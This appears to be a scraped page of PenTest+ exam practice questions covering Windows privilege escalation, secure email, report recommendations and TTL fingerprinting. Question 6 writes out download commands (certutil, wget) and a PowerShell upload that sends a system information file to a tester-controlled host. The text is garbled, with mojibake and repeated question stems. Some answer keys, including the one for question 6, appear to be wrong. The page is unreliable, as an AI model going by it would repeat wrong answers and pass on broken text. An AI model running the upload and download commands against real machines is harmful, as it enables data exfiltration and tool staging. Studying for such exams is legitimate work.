CompTIA PT1-002 - CompTIA PenTest+ Certification Exam Exam
Page: 2 / 22
Total 110 questions
Question #6 (Topic: Topic 1)
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit
misconfigured service permissions. Which of the following commands would help the tester START this process?
misconfigured service permissions. Which of the following commands would help the tester START this process?
A. certutil ג€"urlcache ג€"split ג€"f http://192.168.2.124/windows-binaries/accesschk64.exe
B. powershell (New-Object System.Net.WebClient).UploadFile(ג€˜http://192.168.2.124/upload.phpג€™, ג€˜systeminfo.txtג€™)
C. schtasks /query /fo LIST /v | find /I ג€Next Run Time:ג€
D. wget http://192.168.2.124/windows-binaries/accesschk64.exe ג€"O accesschk64.exe
Answer: B
Question #7 (Topic: Topic 1)
HOTSPOT
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:
[CompTIA-PT1-002-1.0/xmlfile-5_1.png]
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:
[CompTIA-PT1-002-1.0/xmlfile-5_1.png]
Answer: [CompTIA-PT1-002-1.0/xmlfile-6_1.png]
Question #8 (Topic: Topic 1)
Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?
A. S/MIME
B. FTPS
C. DNSSEC
D. AS2
Answer: A
Question #9 (Topic: Topic 1)
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
ג€¢ The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
ג€¢ Network management interfaces are available on the production network.
ג€¢ An Nmap scan returned the following:
[CompTIA-PT1-002-1.0/xmlfile-7_1.png]
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
ג€¢ The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
ג€¢ Network management interfaces are available on the production network.
ג€¢ An Nmap scan returned the following:
[CompTIA-PT1-002-1.0/xmlfile-7_1.png]
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
A. Enforce enhanced password complexity requirements.
B. Disable or upgrade SSH daemon.
C. Disable HTTP/301 redirect configuration.
D. Create an out-of-band network for management.
E. Implement a better method for authentication.
F. Eliminate network management and control interfaces.
Answer: CE
Question #10 (Topic: Topic 1)
A penetration tester ran a ping ג€"A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST
likely return a packet of this type?
likely return a packet of this type?
A. Windows
B. Apple
C. Linux
D. Android
Answer: A
